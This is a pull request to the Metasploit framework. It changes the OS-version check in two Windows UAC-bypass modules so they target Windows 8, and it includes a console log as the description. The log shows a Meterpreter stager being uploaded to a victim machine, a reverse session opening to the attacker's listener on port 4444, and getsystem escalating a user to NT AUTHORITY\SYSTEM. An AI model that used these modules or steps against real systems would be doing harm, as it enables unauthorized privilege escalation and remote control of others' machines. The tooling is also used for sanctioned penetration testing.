### PR TITLE
Fix from David Kennedy, enable Windows 8 support

### DIFF
--- a/modules/exploits/windows/local/bypassuac.rb
+++ b/modules/exploits/windows/local/bypassuac.rb
@@ -56,14 +56,8 @@ class Metasploit3 < Msf::Exploit::Local
 		#
 		vuln = false
 		winver = sysinfo["OS"]
-		affected = [ 'Windows Vista', 'Windows 7', 'Windows 2008', 'Windows 8' ]
-		affected.each { |v|
-			if winver.include? v
-				vuln = true
-			end
-		}
-		if not vuln
-			print_error("#{winver} does not have UAC")
+		if winver !~ /Windows Vista|Windows 2008|Windows [78]/
+			print_error("#{winver} is not vulnerable.")
 			return
 		end
 

--- a/modules/post/windows/escalate/bypassuac.rb
+++ b/modules/post/windows/escalate/bypassuac.rb
@@ -43,13 +43,7 @@ class Metasploit3 < Msf::Post
 		vuln = false
 		sysinfo = session.sys.config.sysinfo
 		winver = sysinfo["OS"]
-		affected = [ 'Windows Vista', 'Windows 7', 'Windows 2008', 'Windows 8' ]
-		affected.each { |v|
-			if winver.include? v
-				vuln = true
-			end
-		}
-		if not vuln
+		if winver !~ /Windows Vista|Windows 2008|Windows [78]/
 			print_error("#{winver} is not vulnerable.")
 			return
 		end


### PR DESCRIPTION
meterpreter > run post/windows/escalate/bypassuac

[!] ************************************************************************
[!] \*                      This module is deprecated!                      *
[!] \*              It will be removed on or about 2013-01-04               *
[!] \*             Use exploit/windows/local/bypassuac instead              *
[!] ************************************************************************
[-] Handler failed to bind to 192.168.0.4:4444
[-] Handler failed to bind to 0.0.0.0:4444
[-] Exploit failed: Rex::AddressInUse The address is already in use (0.0.0.0:4444).
[_] Uploading the bypass UAC executable to the filesystem...
[_] Meterpreter stager executable 73802 bytes long being uploaded..
[_] Uploaded the agent to the filesystem....
meterpreter > 
[_] Sending stage (751104 bytes) to 192.168.0.116
[*] Meterpreter session 2 opened (192.168.0.4:4444 -> 192.168.0.116:25646) at 2013-04-09 02:07:04 -0500

meterpreter > 
meterpreter > getuid
Server username: z420\Developer
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied.
meterpreter > exit
[*] Shutting down Meterpreter...

[_] 192.168.0.116 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(handler) > sessions -i 2
[_] Starting interaction with 2...

meterpreter > getuid
Server username: z420\Developer
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
